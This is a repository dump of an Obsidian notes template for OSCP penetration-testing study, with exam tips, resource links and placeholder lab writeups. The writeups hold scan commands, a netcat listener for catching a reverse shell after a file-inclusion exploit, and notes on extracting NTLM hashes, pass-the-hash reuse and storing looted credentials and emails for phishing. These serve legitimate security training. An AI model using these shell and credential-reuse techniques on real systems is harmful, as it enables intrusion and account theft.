but it may help to at least create a ticklist, or sketch out ideas for how you might exploit a machine to decide what to go for next. 2 | 3 | ## To Do 4 | 5 | Independent Machines: 6 | - [x] [[#Machine 1]] 7 | - [x] Low Privilege Access 8 | - [x] Privilege Escalation 9 | - [ ] [[#Machine 2]] 10 | - [ ] Low Privilege Access 11 | - [ ] Privilege Escalation 12 | - [ ] [[#Machine 3]] 13 | - [ ] Low Privilege Access 14 | - [ ] Privilege Escalation 15 | 16 | Active Directory: 17 | - [x] Initial Access 18 | - [x] Pivoting 19 | - [x] Compromise Domain Controller 20 | 21 | ## AD Set 22 | 23 | [[AD Set Domain Index]] 24 | 25 | ## Machine 1 26 | 27 | [[Exam Machine 1 Index]] 28 | 29 | This machine involved... 30 | 31 | ## Machine 2 32 | 33 | [[Exam Machine 2 Index]] 34 | 35 | ### Todo 36 | 37 | - [x] Scan 38 | 39 | ### Ideas 40 | 41 | - [ ] Check anonymous FTP 42 | - [ ] Check for CVEs in FTP version 43 | 44 | ## Machine 3 45 | 46 | [[Exam Machine 3 Index]] 47 | 48 | ### Todo 49 | 50 | - [ ] Scan -------------------------------------------------------------------------------- /Exam/Independent Machine 1/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 1 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.1|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent Machine 1/Exam Machine 1 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 1/00 - Overview]] -------------------------------------------------------------------------------- /Exam/Independent Machine 2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.2|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent Machine 2/Exam Machine 2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 2/00 - Overview]] -------------------------------------------------------------------------------- /Exam/Independent Machine 3/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Exam Machine 3 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.10.3|Unknown|Unknown| -------------------------------------------------------------------------------- /Exam/Independent Machine 3/Exam Machine 3 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Exam/Independent Machine 3/00 - Overview]] -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Andy Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.0.1|Andy|Windows 7 SP1| 8 | 9 | ## Box Outline 10 | 11 | Box outlines are useful for revisiting the box and seeing how you exploited it. They may help you find practical examples of exploits, or trigger you to think about what you could improve 12 | 13 | **Enumeration** 14 | 15 | What services are running on the box? How did you enumerate them? 16 | 17 | **Exploitation** 18 | 19 | What exploits did you try? Which ones worked? 20 | 21 | **Privilege Escalation** 22 | 23 | What user did you gain access on the box as? What did you find during local enumeration? How did you escalate your privileges? 24 | 25 | **Post Exploitation** 26 | 27 | Any useful information found on the machine. 28 | 29 | ## Timeline 30 | 31 | You can use this section to track when you started and finished this machine, including when you gained a 'foothold' (low-privilege shell) on the box and began privilege escalation. Knowing how long it took can help to judge how long a machine may take on the exam. 32 | 33 | |Date Started|Date of Foothold|Date Finished| 34 | |---|---|---| 35 | ||| 36 | 37 | ## Tags 38 | 39 | Use this section to categorise the machine so you can easily search for machines similar to it. 40 | 41 | #windows -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Andy Enumeration 2 | 3 | ## nmap 4 | 5 | I ran the following command: 6 | 7 | ```bash 8 | $ nmap -sC -sV -oA nmap/andy 10.0.0.1 9 | ``` 10 | 11 | Key Findings: 12 | - Web Server on port 80 13 | - SMB on port 445 14 | 15 | ### All Ports 16 | 17 | I also ran a full port scan: 18 | 19 | ```bash 20 | $ nmap -p- nmap/andy-allports 10.0.0.1 21 | ``` 22 | 23 | It found no new ports. 24 | 25 | ## SMB Enumeration 26 | 27 | ### SMBMap 28 | 29 | I ran `smbmap` to enumerate shares. 30 | 31 | ### SMBClient 32 | 33 | I connected with `smbclient` to read files. 34 | 35 | ## Gobuster 36 | 37 | I ran the following gobuster scan: 38 | 39 | ```bash 40 | $ gobuster dir -u http://10.0.0.1 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x php 41 | ``` 42 | 43 | It found the following interesting pages: 44 | - `/remote.php` -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/10 - Website.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | Screenshot of website index page: 4 | 5 | ![[Pasted image 20210813173305.png]] 6 | 7 | ## Enumerating Tech Stack 8 | 9 | ### Examining Source 10 | 11 | ### Enumerating PHP Version 12 | 13 | ## Gobuster 14 | 15 | I ran [[Labs/10.0.0.1 (Andy)/05 - Enumeration#Gobuster|Gobuster]] - it found `/remote.php`. 16 | 17 | ## Remote File Inclusion 18 | 19 | I found a Remote File Inclusion vulnerability on the `/remote.php` site. 20 | 21 | ### Testing RFI 22 | 23 | Outline process of testing parameters on page for RFI... 24 | 25 | ### Gaining a Shell 26 | 27 | Outline process of debugging shell execution... 28 | 29 | Summary of commands used to gain shell: 30 | - Start a listener with `sudo nc -lnvp -413` 31 | - Visit the following url: ... -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/15 - Shell as Andy.md: -------------------------------------------------------------------------------- 1 | # Shell as Andy 2 | 3 | ## Local Enumeration 4 | 5 | I ran the following commands to enumerate the system: 6 | - `whoami` 7 | - ... 8 | 9 | ## Windows Exploit Suggester 10 | 11 | ### Running Exploit Suggester 12 | 13 | ### Results 14 | 15 | Here is the output of Windows Exploit Suggester... 16 | 17 | I have laid out the potential exploits in [[16 - Potential Local Exploits]] 18 | 19 | ## Trying MS16-032 20 | 21 | Summary of commands used... 22 | 23 | MS16-032 failed. 24 | 25 | ## Trying MS16-135 26 | 27 | Summary of commands used... 28 | 29 | MS16-135 succeeded! We have a shell as `SYSTEM`. -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/16 - Potential Local Exploits.md: -------------------------------------------------------------------------------- 1 | # Potential Local Exploits 2 | 3 | - [x] MS16-032 - failed 4 | - [x] MS16-135 - succeeded 5 | - [ ] MS16-098 -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/20 - Post Exploitation.md: -------------------------------------------------------------------------------- 1 | # Post Exploitation 2 | 3 | I ran the following commands after exploiting the system to find more information about the lab environment. 4 | 5 | ## Network Enumeration 6 | 7 | I ran the following commands to see what the box is communicating with: 8 | 9 | ```cmd 10 | C:> netstat 11 | ``` 12 | 13 | ## Hash Extraction 14 | 15 | I extracted NTLM hashes from the machine as following... 16 | 17 | I tried to crack the password, but couldn't. 18 | 19 | See hashes in [[Lab Loot#Password Hashes]]. -------------------------------------------------------------------------------- /Labs/10.0.0.1 (Andy)/Andy Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.0.0.1 (Andy)/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.0.0.1 (Andy)/05 - Enumeration]] 4 | 5 | Website Assessment: [[10 - Website]] 6 | 7 | Shell on Machine as Andy, Privesc to System: [[15 - Shell as Andy]] 8 | 9 | List of Potential Exploits: [[16 - Potential Local Exploits]] 10 | 11 | Post Exploitation: [[20 - Post Exploitation]] -------------------------------------------------------------------------------- /Labs/10.0.0.2/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # 10.0.0.2 Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.0.0.2|Unknown|Linux| -------------------------------------------------------------------------------- /Labs/10.0.0.2/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | I ran the following scans against 10.0.0.2... -------------------------------------------------------------------------------- /Labs/10.0.0.2/10.0.0.2 Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.0.0.2/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.0.0.2/05 - Enumeration]] -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/00 - Overview.md: -------------------------------------------------------------------------------- 1 | # Sandy Overview 2 | 3 | Machine Details: 4 | 5 | |IP|Hostname|Operating System| 6 | |---|---|---| 7 | |10.1.0.1|Sandy|Linux| -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/05 - Enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | I ran the following scans against 10.1.0.1... 4 | 5 | Key findings: 6 | - Hostname: Sandy (exposed by redirect on port 80) 7 | - FTP on Port 21 (anonymous login allowed) 8 | - Webserver on Port 80 -------------------------------------------------------------------------------- /Labs/10.1.0.1 (Sandy)/Sandy Index.md: -------------------------------------------------------------------------------- 1 | Overview: [[Labs/10.1.0.1 (Sandy)/00 - Overview]] 2 | 3 | Enumeration: [[Labs/10.1.0.1 (Sandy)/05 - Enumeration]] -------------------------------------------------------------------------------- /Labs/Lab Loot.md: -------------------------------------------------------------------------------- 1 | Store any secrets from the labs here. You may be able to reuse them. 2 | 3 | ## Emails 4 | 5 | Store looted emails here in case they can be used to log in or phish users. 6 | 7 | |Email|Where Found?|Notes| 8 | |---|---|---| 9 | ||| 10 | 11 | ## Users 12 | 13 | Store known/potential users that you've found here - they may also have accounts on other systems. 14 | 15 | |Username|Where Found?|Notes| 16 | |---|---|---| 17 | ||| 18 | 19 | ## Passwords 20 | 21 | Store plaintext or cracked passwords here for potential later reuse. 22 | 23 | |Username|Password|Service|Where Found?|Notes| 24 | |---|---|---|---|---| 25 | |||||| 26 | 27 | ## Password Hashes 28 | 29 | You can reuse NTLM hashes in pass the hash attacks, or by cracking them and using the passwords for password reuse attacks later in the lab. Store them here. 30 | 31 | |Hash|Hash Type|Where Found?|Notes| 32 | |---|---|---|---| 33 | |08fb...89ed|NTLM|[[15 - Shell as Andy\|Andy]]|We could reuse this in a pass the hash attack...| -------------------------------------------------------------------------------- /Labs/Labs Index.md: -------------------------------------------------------------------------------- 1 | ## Accessing the Labs 2 | 3 | **Add your personalised Control Panel link here** 4 | 5 | Connection command: 6 | 7 | ```bash 8 | $ openvpn ... 9 | ``` 10 | 11 | ## Network Scans 12 | 13 | See [[Network Scans]] for details of how I enumerated the lab environment. 14 | 15 | ## Machines 16 | 17 | See writeups of machines below. 18 | 19 | ### Windows Machines 20 | 21 | **Network A** 22 | - [[Andy Index|Andy (10.0.0.1)]] 23 | 24 | **Network B** 25 | - [[Sandy Index|Sandy (10.1.0.1)]] 26 | 27 | ### Linux Machines 28 | 29 | **Network A** 30 | - [[10.0.0.2 Index|10.0.0.2]] -------------------------------------------------------------------------------- /Labs/Lessons Learned.md: -------------------------------------------------------------------------------- 1 | In this note I collected all the key things I learned on the labs - useful commands for obscure services, alternative ways to enumerate for niche or well-hidden files, common pitfalls and issues with specific services or techniques, and things I wished I'd known when stuck in a rabbit hole for hours. 2 | 3 | These lessons can really be anything - the purpose of this note is to look back at what mistakes you made, and to have a resource to look at when you're in a rut. 4 | 5 | I split the lessons into vague categories, with links to the machines that I learned them on. An example layout is below. 6 | 7 | ## Enumeration 8 | 9 | ### Nmap 10 | 11 | - Use the `-v` flag to see ports as they appear - this lets you explore the attack surface quicker 12 | 13 | ### Windows 14 | 15 | - On old versions, there are some alternatives to `whoami`: 16 | - `set` 17 | - `systeminfo` 18 | - `net user` 19 | - `echo %username%` 20 | - `echo %userprofile%` 21 | 22 | ## Password Cracking 23 | 24 | - Use the `-n` flag when echoing hashes to a file to avoid a trailing newline (see [[Andy Index|Andy]]) -------------------------------------------------------------------------------- /Labs/Live Hosts.md: -------------------------------------------------------------------------------- 1 | Track live lab hosts here. I found it helps to add notes about the host after the IP address, so I can identify my next target. 2 | 3 | **Highlight** any exploits that may identify low-hanging fruit. 4 | 5 | Tick the hosts off as you complete them. 6 | 7 | ## Example Network A 8 | 9 | **IP Range:** 10.0.0.1/24 10 | 11 | - [x] 10.0.0.1 (Windows 7 Host - Port 80 and 445 open) 12 | - [ ] 10.0.0.2 (Linux Host - Port 8000 and 3306 open) 13 | 14 | ## Example Network B 15 | 16 | **IP Range:** 10.1.0.1/24 17 | 18 | - [ ] 10.1.0.1 (Linux Host - Port 80 and 21 open - **Anonymous FTP allowed**) -------------------------------------------------------------------------------- /Labs/Network Scans.md: -------------------------------------------------------------------------------- 1 | I ran the following commands to enumerate the whole lab environment. 2 | 3 | ## Network A 4 | 5 | ### Host Discovery 6 | 7 | Command: 8 | 9 | ```bash 10 | $ nmap ... 11 | ``` 12 | 13 | ### Vulnerability Scanning 14 | 15 | I used Nessus to scan the network - see the results below... 16 | 17 | ## Network B 18 | 19 | ### Host Discovery 20 | 21 | ```bash 22 | $ nmap ... 23 | ``` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP Notes Template 2 | 3 | **Important Note**: if you use this repository, make sure you do not publicly share your OSCP notes by accident (i.e. in a public fork of this repo) or OffSec will be [angry](https://cdn.emojidex.com/emoji/seal/Angryping.png). I am not responsible if you do so and lose access to your course - please be careful and clone this resource locally rather than forking it! If you want your notes on GitHub (which I agree is useful) follow these steps to create a private fork: https://stackoverflow.com/questions/10065526/github-how-to-make-a-fork-of-public-repository-private 4 | 5 | ## Introduction 6 | 7 | This is a template for an Obsidian Vault used to store OSCP notes. Obsidian allows building a highly connected, searchable resource that you can use to find examples of code snippets and connect related machines. 8 | 9 | The [[Course Notes Index|Course Notes]], [[Exam Index|Exam]], and [[Labs Index|Labs]] folders contain template folders for you to add your notes for these respective sections to. 10 | 11 | I cannot upload my OSCP notes due to OffSec policy, but I still wanted to share a useful resource. There are plenty of [[Report Templates]] out there, and some good [note-taking advice](https://www.youtube.com/watch?v=MQGozZzHUwQ), but I haven't seen a structured notes template before. Hopefully this will be useful for future students who want to supplement their learning. 12 | 13 | I've added a few resources to each of the notes, but they are there for you to flesh out (or delete) at your will. This is simply a template, and more detailed notes are available in my [[Cybersecurity Notes]] repository. 14 | 15 | ## Installation 16 | 17 | ### Installing Obsidian 18 | 19 | #### On Windows 20 | 21 | Go to [the download page](https://obsidian.md/download)... and click Download. Once it's downloaded, double click the executable to run it. 22 | 23 | #### On Linux 24 | 25 | Go to [the download page](https://obsidian.md/download), and download the AppImage. Put it in any directory you want (I went with `~/Applications`) 26 | 27 | You can either double click the file to run it, or run it with `/path/to/Obsidian-0.11.9.AppImage` 28 | 29 | You may get the following error while running: 30 | 31 | ```bash 32 | $ ./Obsidian-0.11.9.AppImage 33 | \[2122:0327/193255.690087:FATAL:setuid\_sandbox\_host.cc(158)\] The SUID sandbox helper binary was found, but is not configured correctly. Rather than run without sandboxing I'm aborting now. You need to make sure that /tmp/.mount\_Obsidi1nvAuD/chrome-sandbox is owned by root and has mode 4755. 34 | Trace/breakpoint trap 35 | ``` 36 | 37 | To fix this, run obsidian with the `--no-sandbox` flag. 38 | 39 | I setup this alias in `~/.bashrc`: 40 | 41 | ```bash 42 | alias obsidian="~/Applications/Obsidian-0.11.9.AppImage --no-sandbox" 43 | ``` 44 | 45 | Finally, if Obsidian stops responding on launch, you may need to update your machine: 46 | 47 | ```bash 48 | $ sudo apt update 49 | $ sudo apt full-upgrade -y 50 | ``` 51 | 52 | ### Downloading the Vault 53 | 54 | You will need to [download git](https://git-scm.com/downloads). This is a quick and easy process. 55 | 56 | On Windows, open the Start Menu and search for 'Git Bash', then click it to open a bash terminal (or navigate to the folder you want to install the notes into, then right-click and press 'Git Bash Here'). On Unix, open a terminal of your choice. 57 | 58 | In this Git Bash/terminal, type the following: 59 | 60 | ```bash 61 | git clone git@github.com:Twigonometry/OSCP-Notes-Template.git 62 | ``` 63 | 64 | If you are uncomfortable using the command line, you can install [GitHub Desktop](https://desktop.github.com/) instead (but you'll need to learn it soon enough!) 65 | 66 | Once you have cloned the repository, open Obsidian and click `Open folder as vault`, then select the `OSCP-Notes-Template` folder that was just created by Git. You're ready to go! 67 | 68 | ## Usage 69 | 70 | ### Approach 71 | 72 | Everyone's note-taking approach is different. Some people might hate Obsidian, but personally I found it very useful for organising and linking my notes, especially when an OSCP box had an exploit I'd seen before and I could link the two notes together. 73 | 74 | I could also use the graph to track where I'd found certain secrets across the network, and which boxes talked to each other. I stored both my machine writeups and my course content notes in the same vault, so I could also easily link examples in the course material to practical examples from the labs. 75 | 76 | Here is an example of the graph Obsidian can generate, with all related notes linked together: 77 | 78 | ![[Pasted image 20210813180944.png]] 79 | 80 | Organising notes this way may seem like a lot of overhead. I don't recommend making your notes this fleshed out while solving the box, but I do think it is useful to go back and complete this process after you've finished. It will help consolidate what you've learned, and make examples of exploits easier to find during the exam. 81 | 82 | You can treat this as a true [Zettelkasten](https://zenkit.com/en/blog/a-beginners-guide-to-the-zettelkasten-method/), with each note representing a [[Find Writeable Directories|singular concept]] - or you can have notes that show [[15 - Shell as Andy|a narrative]]. I prefer a mix - notes on tools are good as singular items, and writeups of machines are good to read in one long document. Cheat sheets can be used to link the two with examples. 83 | 84 | ### Course Content 85 | 86 | You can make notes on course content within the [[Course Notes Index|Course Notes]] folder. I like to include example commands within code fences (single/triple backtick ``` ` ``` characters). 87 | 88 | I like keeping my notes within headings so that I can then link these headers to a practical example on a machine, using `[[course chapter#section]]`. 89 | 90 | ### Writing up Lab Machines 91 | 92 | The [[Labs Index|Labs]] folder can be used to house writeups for machines in the labs. I've added a folder for each one, with `IP Address (Hostname)` as the title. 93 | 94 | Within each folder is an index for the machine, which links all the related notes on the graph, an Overview which outlines key machine details, and usually a 'Lessons Learned' note which highlights important new skills or tools I learned solving the box (or things I did wrong). 95 | 96 | See [[Labs/10.0.0.1 (Andy)/00 - Overview]] for a fleshed out example Box Overview. 97 | 98 | I then create a note for each 'stage' of the box - commonly one for generic enumeration, one for each service I interact with beyond standard enum scripts, and one for each shell I gain as a specific user. 99 | 100 | ### Resources 101 | 102 | You will find assorted OSCP resources in the `/Resources` folder. They vary from collections of advice posts on various forums, to extra cheatsheets and tools to make your life easier. Feel free to add to this folder as you find things. 103 | 104 | ### Obsidian Tricks 105 | 106 | Obsidian makes it super easy to build good notes. Here are some of the best features: 107 | - `Ctrl + K` for inserting links 108 | - `[[note]]` for referencing an internal note and creating a graph. You can use a pipe (`|`) to name the link, or a hash (`#`) to link to a heading in the note 109 | - `Ctrl + G` to view your graph 110 | - `Ctrl + L` to view a 'local graph' for a note - this lets you explore connections to a note 111 | - `Ctrl + Click` a note link to open it in a new tab (Obsidian [now supports tabs!](https://forum.obsidian.md/t/obsidian-release-v1-0-0/44873)) 112 | 113 | You can add screenshots, headings, and any other formatting option supported by markdown. 114 | 115 | You can also make use of the document outline feature (in the right-hand side panel) for an automatically generated contents page. 116 | 117 | #### Canvases 118 | 119 | Obsidian has a neat new feature called a Canvas which can be used to lay out notes in a free-flowing diagram. You can link existing notes, add images, and create notes that only exist in the canvas. It's potentially useful for Active Directory sets - I've included an [[Active Directory Set.canvas|Example]] in the `/Exam` folder. 120 | 121 | #### Workspaces 122 | 123 | You can open a workspace using the workspace button in the left-hand sidebar - this loads a saved layout of notes. You can group together notes you open together frequently (such as a specific lab machine and notes on relevant exploits from the course material) and save your current workspace using the 'save' button. 124 | 125 | #### PDF Generation 126 | 127 | You can create a PDF of a note with the 'Export to PDF' button in the kebab menu at the top of each note. 128 | 129 | ![[Pasted image 20230324145839.png]] 130 | 131 | Bear in mind that Obsidian links will no longer work. 132 | 133 | #### Website-Friendly Note Conversion 134 | 135 | If you want to host your notes on a website, you can convert them to a HTML-friendly format using my [writeup converter](https://github.com/Twigonometry/writeup-converter#website-formatter) tool - this combines all markdown files in a given folder into one HTML document, and reformats obsidian links (`[[]]`) and turns them into valid HTML tags. 136 | 137 | Remember not to host your writeups or any OffSec course content online... 138 | 139 | #### Screenshots 140 | 141 | Attachments (i.e. images) are set to be stored in the `/Attachments` folder automatically. If you copy and paste an image into Obsidian it will be automatically named and indexed. 142 | 143 | ## Roadmap 144 | 145 | To add to template: 146 | - [x] Instructions for converting Lab report to a PDF 147 | - [x] Workspaces 148 | - [ ] Hotkeys 149 | - [x] Exam tips 150 | - [x] Cheatsheets 151 | - [x] Enable outlines plugin 152 | - [ ] Timeline plugin support 153 | - [ ] Flameshot setup 154 | - [x] Updated exam details 155 | - [x] AD set layout 156 | - [x] Example Canvas for AD set 157 | -------------------------------------------------------------------------------- /Resources/Communities.md: -------------------------------------------------------------------------------- 1 | ## Offsec Forums 2 | 3 | [https://forums.offensive-security.com](https://forums.offensive-security.com) 4 | 5 | ## Offsec Discord Server 6 | 7 | [https://offs.ec/2Q2AL4b](https://offs.ec/2Q2AL4b) ([source](https://www.reddit.com/r/oscp/comments/mwijg3/join_the_offensive_security_discord_server/)) 8 | 9 | ## OSCP Reddit 10 | 11 | [https://www.reddit.com/r/oscp/](https://www.reddit.com/r/oscp/) -------------------------------------------------------------------------------- /Resources/Cybersecurity Notes.md: -------------------------------------------------------------------------------- 1 | For more in-depth cheatsheets and writeups, you can download my [Cybersecurity Notes](https://github.com/Twigonometry/Cybersecurity-Notes) Obsidian Vault. -------------------------------------------------------------------------------- /Resources/Exam Details.md: -------------------------------------------------------------------------------- 1 | ## Key Details 2 | 3 | **Length:** 4 | - 23 Hours and 45 Minutes for the exam 5 | - 24 Hours to submit the report 6 | 7 | **Available Points** 8 | - 100 Points from Machines 9 | - 20 each from 3 independent targets 10 | - 40 points for FULL COMPROMISE of the Active Directory Set 11 | - 10 Bonus Points from Report 12 | 13 | Since the course updates ([2022](https://www.offsec.com/offsec/oscp-exam-structure/) and [2023](https://www.offsec.com/offsec/pen-200-2023/)), good organisation of linked machines is more important than ever 14 | 15 | **Passing Grade** 16 | - 70 Points needed to pass 17 | 18 | ## Exam Guide 19 | 20 | The comprehensive exam guide. **Read this in full!** 21 | 22 | [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) 23 | 24 | ## Exam Support Page 25 | 26 | This page collects several articles on exam topics, including machine hints. 27 | 28 | [https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-](https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-) 29 | 30 | ## Exam Rules & Restrictions 31 | 32 | ### Restrictions on Tools 33 | 34 | In summary, commercial tools, automatic exploitation tools, and mass scanning tools are forbidden. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) 35 | 36 | **One use** of Metasploit is allowed. However, utility such as the metasploit handler module and the msfvenom payload generator have no limitations on use. **Auxiliary** modules are also limited, such as scanners. Source: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#metasploit-restrictions) 37 | 38 | Some common tools such as LinPEAS have caused issues in the past with automatic exploitation features - the [updated version](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues/125) of LinPEAS is now OSCP-friendly, but Offsec will make no exceptions in future. Read the full statement here: [https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/) 39 | 40 | ### Proctoring and Use of Notes 41 | 42 | OSCP is open book - you can use google and your own notes in the exam. Source: [https://www.offensive-security.com/offsec/proctoring/](https://www.offensive-security.com/offsec/proctoring/) -------------------------------------------------------------------------------- /Resources/Exam Tips.md: -------------------------------------------------------------------------------- 1 | ## Writeups and Guides 2 | 3 | ### From TJNull 4 | 5 | [https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html](https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html) 6 | 7 | ### From /u/tristanlogd 8 | 9 | ![[Pasted image 20210418203944.png]] 10 | 11 | Source: [https://www.reddit.com/r/oscp/comments/k7x4o1/just_passed_oscpmy_journey_and_tips/](https://www.reddit.com/r/oscp/comments/k7x4o1/just_passed_oscpmy_journey_and_tips/) 12 | 13 | ### From JohnJHacking 14 | 15 | [[https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/](https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/)]([https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/](https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/)) 16 | 17 | ### My Writeup 18 | 19 | I did my OSCP back in 2021, before the [new course](https://www.offsec.com/offsec/oscp-exam-structure/) was rolled out, which shifted focus away from Buffer Overflows . It has since then been [updated again](https://www.offsec.com/offsec/pen-200-2023/), with a wealth of new content and expansions on old modules. Unfortunately, even if you paid for the OSCP in the past you can't access the new content, despite already forking out over a grand... 20 | 21 | I think this change towards AD-focused content was a positive one, and will modernise the OSCP content a lot. However, I can no longer guarantee that this notes template is laid out in the optimal way for the new content, labs, and exam. You might need to do some tweaking! 22 | 23 | Neverthless, you can read my writeup of my OSCP experience here: https://www.mac-goodwin.com/blog/cyber/2021/10/16/oscp-experience.html 24 | 25 | The TLDR is that I learned a lot from my OSCP and thoroughly enjoyed the experience, but I believe the criticism of OffSec's predatory pricing is pretty much warranted. However, the course was still very valuable to me and made me a better hacker - if you can afford it, I recommend it, but remember there are lots of cheaper courses out there (including the [PEH course](https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)). Overall, the OSCP is still one of the most recognised certifications out there, and I can attest to its 'HR power' in job interviews and recruiting. OffSec critics don't like to admit it, but the letters next to your name grab the attention of employers, even if they don't mean you're a top-notch hacker. 26 | 27 | ## Taking Screenshots 28 | 29 | Proof screenshots for the exam [need to include](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#screenshot-requirements) the following: 30 | - IP address of the machine (to prove you aren't in a container) 31 | - Contents of `proof.txt` 32 | 33 | From within the directory that holds `proof.txt` (usually `C:\Users\Administrator\Desktop` on Windows and `/root` on Linux), the following command lets you view the required info in one line: 34 | - Windows: `type proof.txt && ipconfig` 35 | - Linux: `cat proof.txt && ip addr` 36 | 37 | Alternative commands are: 38 | - `ifconfig` 39 | - `netstat -ie` (not accepted in the exam, but can be used for your own personal purposes in the lab machines if above commands do not work) 40 | 41 | ## Taking Breaks 42 | 43 | Take regular breaks! 44 | 45 | Try to set yourself regular timers to avoid rabbit holes, and move on after 30 minutes of trying something without progress. -------------------------------------------------------------------------------- /Resources/Report Templates.md: -------------------------------------------------------------------------------- 1 | # OSCP Report Templates 2 | 3 | Here are some nice templates for laying out your report. 4 | 5 | - PDFs with custom colours - also has templates for OSEP, OSED: [https://github.com/noraj/OSCP-Exam-Report-Template-Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown) 6 | - Docx templates: [https://github.com/whoisflynn/OSCP-Exam-Report-Template](https://github.com/whoisflynn/OSCP-Exam-Report-Template) 7 | 8 | OffSec Example Report: [https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf](https://www.offensive-security.com/pwk-online/PWK-Example-Report-v1.pdf) -------------------------------------------------------------------------------- /Resources/Tools.md: -------------------------------------------------------------------------------- 1 | # OSCP Tools 2 | 3 | ## nmapAutomator 4 | 5 | An automatic background recon tool: [https://github.com/21y4d/nmapAutomator](https://github.com/21y4d/nmapAutomator) 6 | 7 | ## Autorecon 8 | 9 | Another automatic reconnaisance tool that does more than nmapAutomator: [https://github.com/Tib3rius/AutoRecon](https://github.com/Tib3rius/AutoRecon) 10 | 11 | I often find that less automation is better when doing initial recon - Autorecon will do a lot of scans and not necessarily all of them will be relevant (some of them may even fail). I recommend building your own methodology first (perhaps by looking at the kind of commands these tools run) and practicing manual enumeration, and only using Autorecon once you're comfortable with doing it yourself. --------------------------------------------------------------------------------